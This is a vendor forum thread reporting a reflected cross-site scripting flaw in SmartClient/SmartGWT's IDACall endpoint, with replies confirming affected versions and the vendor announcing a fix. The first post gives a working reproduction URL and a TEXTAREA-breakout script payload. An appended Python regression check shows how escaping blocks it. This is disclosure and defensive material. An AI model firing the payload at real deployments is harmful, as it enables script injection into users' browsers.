
    Reflected Cross-site Scripting in IDACall endpoint

    Hi,

    I ran some vulnerability tests on our system since we are using the SmartGWT framework.
    During the testing, we were able to inject a Reflected Cross-Site Scripting (XSS) payload in the IDACall endpoint.

    To reproduce the issue, paste the URL below into a browser.

    URL:
    Code:
    http://serverurl/administratortool/sc/IDACall?&isc_rpc=1&isc_tnum=300&_transaction=%3Ctransaction+xmlns%3Axsi%3D%22http%3A//www.w3.org/2000/10/XMLSchema-instance%22+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CtransactionNum+xsi%3Atype%3D%22xsd%3Along%22%3E5%3C/transactionNum%3E%3Coperations+xsi%3Atype%3D%22xsd%3AList%22%3E%3Celem+xsi%3Atype%3D%22xsd%3AObject%22%3E%3CappID%3Eisc_builtin%3C/appID%3E%3CclassName%3Ebuiltin%3C/className%3E%3CmethodName%3Etest123%26lt%3B/TEXTAREA+%26gt%3B%26lt%3Bscript%26gt%3Balert(document.domain)%26lt%3B/script%26gt%3Bl123%3C/methodName%3E%3Cis_ISC_RPC_DMI+xsi%3Atype%3D%22xsd%3Aboolean%22%3Etrue%3C/is_ISC_RPC_DMI%3E%3C/elem%3E%3C/operations%3E%3Ccallback%3Etest123%3C/callback%3E%3C/transaction%3E&protocolVersion=1.0&__iframeTarget__=isc_HiddenFrame_0
    Inside _transaction, we injected the methodName value with: "test123</TEXTAREA ><script>alert(document.domain)</script>l123" and an alert showing document.domain will appear.

    We also tested this using Burp Suite, and here’s the raw response:

    [HTML]
    <HTML>
    <BODY ONLOAD='var results = document.formResults.results.value;null'><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><FORM name='formResults'><TEXTAREA readonly name='results'>
    //isc_RPCResponseStart-->[{data:"Attempt to execute RPC DMI Builtin 'test123</TEXTAREA ><script>alert(document.domain)</script>l123' DENIED by server.properties configuration. To enable this method, add it to the list of methods under RPCManager.enabledBuiltinMethods in server.properties",status:-1}]//isc_RPCResponseEnd</TEXTAREA></FORM>
    </BODY></HTML>
    [/HTML]


    May I ask if this is a vulnerability that comes from the SmartGWT framework?
    Is there a recommended way to prevent it?

    Thank you.
    Last edited by Marco123; 25 Nov 2025, 10:34.

    #2
    What product and version are you using?

    Be sure to update to the latest patched build (see smartclient.com/builds) before claiming any vulnerabilities.



      #3
      Hi Isomorphic, I’m not a security expert, but this seems to happen with:

      SmartClient Version: v13.1p_2025-11-19/Enterprise Deployment (built 2025-11-19)



        #4
        For me too, just by calling this URL (v13.1p_2025-11-25). Question is, can one trigger this request from the application itself?



          #5
          Hi Isomorphic, thank you for the quick response.

          We are using SmartClient Version: v12.1p_2021-07-14/PowerEdition Deployment (built 2021-07-14)

          May I ask if this has been resolved in the latest patched build of v12.1p?



            #6
            Thanks for the report, and the confirmations from other community members. This issue should be fixed in all versions from 11.0 onwards as of today's builds (i.e., those dated November 27).
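
Added example, not part of the thread and not SmartClient's own code: a regression check for the response shape quoted in the first post, showing why the echoed methodName ends the TEXTAREA early and how HTML-escaping the payload keeps it inside while the client still reads the same `.value`. The wrapper is abridged from that response; `rpc_payload`, `render_unescaped`, `render_escaped`, `split_textarea` and `reflects_markup` are hypothetical names.

```python
import html
import re

TEXTAREA_OPEN = "<TEXTAREA readonly name='results'>"
# Page wrapper modelled on the raw response in the first post (abridged, constructed).
HEAD = ("<HTML>\n<BODY ONLOAD='var results = document.formResults.results.value;null'>"
        "<FORM name='formResults'>" + TEXTAREA_OPEN + "\n//isc_RPCResponseStart-->")
TAIL = "//isc_RPCResponseEnd</TEXTAREA></FORM>\n</BODY></HTML>"

# An HTML tokenizer leaves TEXTAREA (RCDATA) content at the first "</textarea"
# followed by whitespace, "/" or ">", matched case-insensitively.
TEXTAREA_END = re.compile(r"</textarea[\s/>]", re.IGNORECASE)


def rpc_payload(method_name):
    """Hypothetical stand-in for the server's denial message that echoes methodName."""
    return ('[{data:"Attempt to execute RPC DMI Builtin \'%s\' DENIED by '
            'server.properties configuration.",status:-1}]' % method_name)


def render_unescaped(method_name):
    """'Before' behaviour seen in the quoted response: payload written as-is."""
    return HEAD + rpc_payload(method_name) + TAIL


def render_escaped(method_name):
    """Hardened form: escape &, < and > so the payload cannot end the TEXTAREA."""
    return HEAD + html.escape(rpc_payload(method_name), quote=False) + TAIL


def split_textarea(page):
    """Return (text the browser exposes as .value, markup parsed after the TEXTAREA)."""
    start = page.index(TEXTAREA_OPEN) + len(TEXTAREA_OPEN)
    end = TEXTAREA_END.search(page, start)
    raw = page[start:end.start()]
    # Browsers drop one leading newline in a TEXTAREA and decode character references.
    value = html.unescape(raw[1:] if raw.startswith("\n") else raw)
    return value, page[end.start():]


def reflects_markup(page):
    """True if a <script> element would be parsed outside the TEXTAREA."""
    _, after = split_textarea(page)
    return re.search(r"<script\b", after, re.IGNORECASE) is not None


# Probe value taken from the first post.
PROBE = "test123</TEXTAREA ><script>alert(document.domain)</script>l123"
```

Running `reflects_markup` over a response captured from a patched build, with the same probe, gives a repeatable pass/fail check after upgrading.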
